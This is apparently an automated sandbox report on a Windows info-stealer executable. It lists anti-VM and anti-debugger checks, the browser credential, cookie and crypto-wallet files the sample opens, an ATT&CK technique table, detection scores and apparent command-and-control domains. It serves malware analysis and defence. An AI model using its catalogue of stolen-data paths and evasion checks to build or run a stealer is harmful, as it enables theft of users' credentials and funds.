                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30D06 second address: 4E30D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30D42 second address: 4E30D65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov dh, cl 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Special instruction interceptor: First address: 4F7988 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Special instruction interceptor: First address: 4F558A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Special instruction interceptor: First address: 6C8D9A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Special instruction interceptor: First address: 6AAAA0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Special instruction interceptor: First address: 72F428 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe TID: 5952 Thread sleep time: -270000s >= -30000s
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe TID: 3652 Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: LNn56KMkEE.exe, 00000000.00000002.1928183102.000000000067E000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.000000000100F000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872601803.000000000100F000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924345681.000000000100F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnH
                Source: LNn56KMkEE.exe, 00000000.00000002.1929021676.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`Z
                Source: LNn56KMkEE.exe, LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.000000000100F000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872601803.000000000100F000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924345681.000000000100F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: LNn56KMkEE.exe, 00000000.00000002.1928183102.000000000067E000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: NTICE
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: SICE
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: LNn56KMkEE.exe, 00000000.00000002.1928183102.000000000067E000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: o=xvRProgram Manager
                Source: LNn56KMkEE.exe, 00000000.00000002.1928183102.000000000067E000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: =xvRProgram Manager
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: LNn56KMkEE.exe, 00000000.00000003.1872542215.000000000101F000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872341899.000000000105D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872273145.000000000588E000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872523469.0000000001070000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872466904.0000000005890000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: Process Memory Space: LNn56KMkEE.exe PID: 6948, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: LNn56KMkEE.exe String found in binary or memory: %appdata%\Electrum\wallets
                Source: LNn56KMkEE.exe String found in binary or memory: %appdata%\ElectronCash\wallets
                Source: LNn56KMkEE.exe String found in binary or memory: window-state.json
                Source: LNn56KMkEE.exe String found in binary or memory: Wallets/JAXX New Version
                Source: LNn56KMkEE.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: LNn56KMkEE.exe String found in binary or memory: Wallets/Ethereum
                Source: LNn56KMkEE.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: LNn56KMkEE.exe String found in binary or memory: keystore
                Source: LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Directory queried: number of queries: 1001
                Source: Yara match File source: Process Memory Space: LNn56KMkEE.exe PID: 6948, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match File source: Process Memory Space: LNn56KMkEE.exe PID: 6948, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 34 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 751 Security Software Discovery | Remote Desktop Protocol | 41 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 34 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 223 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

                Source | Detection | Scanner | Label
                LNn56KMkEE.exe | 68% | Virustotal |
                LNn56KMkEE.exe | 61% | ReversingLabs | Win32.Trojan.Generic
                LNn56KMkEE.exe | 100% | Avira | TR/Crypt.XPACK.Gen
                LNn56KMkEE.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                steamcommunity.com | 104.102.49.254 | true | false | | high
                lev-tolstoi.com | 104.21.66.86 | true | false | | high
                sustainskelet.lat | unknown | unknown | false | | high
                crosshuaht.lat | unknown | unknown | false | | high
                rapeflowwj.lat | unknown | unknown | false | | high
                grannyejh.lat | unknown | unknown | false | | high
                aspecteirs.lat | unknown | unknown | false | | high
                sweepyribs.lat | unknown | unknown | false | | high
                discokeyus.lat | unknown | unknown | false | | high
                energyaffai.lat | unknown | unknown | false | | high
                necklacebudi.lat | unknown | unknown | false | | high
                Name | Malicious | Antivirus Detection | Reputation
                aspecteirs.lat | false | | high
                sweepyribs.lat | false | | high
                sustainskelet.lat | false | | high
                rapeflowwj.lat | false | | high
                https://steamcommunity.com/profiles/76561199724331900 | false | | high
                energyaffai.lat | false | | high
                https://lev-tolstoi.com/api | false | | high
                grannyejh.lat | false | | high
                necklacebudi.lat | false | | high
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/chrome_newtab | LNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://player.vimeo.com | LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/ac/?q= | LNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://steamcommunity.com/?subsection=broadcasts | LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://lev-tolstoi.com/s | LNn56KMkEE.exe, 00000000.00000003.1872487701.0000000001075000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417. | LNn56KMkEE.exe, 00000000.00000003.1843859744.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843320427.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843924713.000000000589B000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                                        https://store.steampowered.com/subscriber_agreement/LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.gstatic.cn/recaptcha/LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEELNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.valvesoftware.com/legal.htmLNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enLNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.youtube.comLNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.google.comLNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://bridge.lga1.admarkeLNn56KMkEE.exefalse
                                                                                        unknown
                                                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiLNn56KMkEE.exe, 00000000.00000003.1843320427.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843924713.000000000589B000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843987961.0000000005891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackLNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englLNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisLNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCLNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://s.ytimg.com;LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://community.fastly.steamstatic.com/public/css/LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1LNn56KMkEE.exe, LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774699395.000000000106A000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924283803.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 
00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
